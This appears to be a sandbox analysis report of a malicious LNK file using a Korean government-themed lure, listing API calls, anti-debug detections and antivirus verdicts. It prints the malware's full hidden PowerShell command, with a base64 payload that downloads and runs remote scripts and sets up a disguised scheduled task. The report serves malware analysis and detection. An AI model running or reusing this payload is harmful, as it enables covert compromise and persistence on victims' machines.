base_address: 0x02a30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a35000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a36000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a37000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a39000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a3a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a3b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a3c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a3d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a3e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a3f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2064
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\ms_update.ps1
file C:\Users\test22\AppData\Local\Temp\hello9.ps1
file C:\Users\test22\AppData\Local\Temp\통일부 5월 간담회 계획안(줄리 터너대사 방한건_인권 탈북).docx.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIu2GteydvOu2gCA17JuUIOqwhOuLtO2ajCDqs4Ttmo3slYgo7KSE66asIO2EsOuEiOuMgOyCrCDrsKntlZzqsbRf7J246raMIO2DiOu2gSkuZG9jeCI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHA6Ly8xMjcuMC4wLjEvMDUyMS5kb2N4IiAtT3V0RmlsZSAkaGhoOyAmICRoaGg7ICRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIm1zX3VwZGF0ZS5wczEiOyAkc3RyID0gJyRhYWEgPSBKb2luLVBhdGggKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCkpICJ0dHQucHMxIjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzEyNy4wLjAuMi8wNTIxLXgudHh0IiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJGZpbGVQYXRoIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgXCJtc191cGRhdGUucHMxXCI7IHBvd2Vyc2hlbGwgLXdpbmRvd3N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAkZmlsZVBhdGg7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIk1pY3Jvc29mdEVkZ2VVcGRhdGVUYXNrTWFjaGluZVRVQUsiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgInN3X2ZpcnN0LnBzMSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vMTI3LjAuMC4zLzA1MjEtZi50eHQiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2068
thread_handle: 0x000002ec
process_identifier: 2064
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIu2GteydvOu2gCA17JuUIOqwhOuLtO2ajCDqs4Ttmo3slYgo7KSE66asIO2EsOuEiOuMgOyCrCDrsKntlZzqsbRf7J246raMIO2DiOu2gSkuZG9jeCI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHA6Ly8xMjcuMC4wLjEvMDUyMS5kb2N4IiAtT3V0RmlsZSAkaGhoOyAmICRoaGg7ICRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIm1zX3VwZGF0ZS5wczEiOyAkc3RyID0gJyRhYWEgPSBKb2luLVBhdGggKFtTeXN0ZW0uSU8uUGF0aF06OkdldFRlbXBQYXRoKCkpICJ0dHQucHMxIjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzEyNy4wLjAuMi8wNTIxLXgudHh0IiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJGZpbGVQYXRoIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRmaWxlUGF0aCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgXCJtc191cGRhdGUucHMxXCI7IHBvd2Vyc2hlbGwgLXdpbmRvd3N0eWxlIGhpZGRlbiAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAkZmlsZVBhdGg7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIk1pY3Jvc29mdEVkZ2VVcGRhdGVUYXNrTWFjaGluZVRVQUsiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgInN3X2ZpcnN0LnBzMSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vMTI3LjAuMC4zLzA1MjEtZi50eHQiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = [System.IO.Path]::GetTempPath();$dd = \"hello9.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; powershell -windowstyle hidden -ExecutionPolicy Bypass $ee"
filepath_r: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f4
1 1 0

CreateProcessInternalW

 thread_identifier: 2216
thread_handle: 0x00000484
process_identifier: 2212
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000488
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Lionic Trojan.WinLNK.Powecod.4!c
Skyhigh BehavesLike.Trojan.fl
ALYac Trojan.Agent.LNK.Gen
Symantec Scr.Mallnk!gen1
McAfee Artemis!028075A00BEB
Avast LNK:Agent-EL [Trj]
Kaspersky HEUR:Trojan.Multi.Powecod.a
MicroWorld-eScan Trojan.GenericKD.73873058
Rising Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Sophos Troj/LnkObf-T
SentinelOne Static AI - Suspicious LNK
Google Detected
Kingsoft Script.Troj.CMDLnk.22143
ZoneAlarm HEUR:Trojan.Multi.Powecod.a
Varist LNK/ABTrojan.QOOA-
VBA32 Trojan.Link.Crafted
huorong TrojanDownloader/LNK.Netloader.r
AVG LNK:Agent-EL [Trj]
alibabacloud Trojan:Multi/Powecod.a
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass C:\Users\test22\AppData\Local\Temp\hello9.ps1
Process injection Process 2004 resumed a thread in remote process 2064
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2064
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noninteractive value Prevents creating an interactive prompt for the user
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe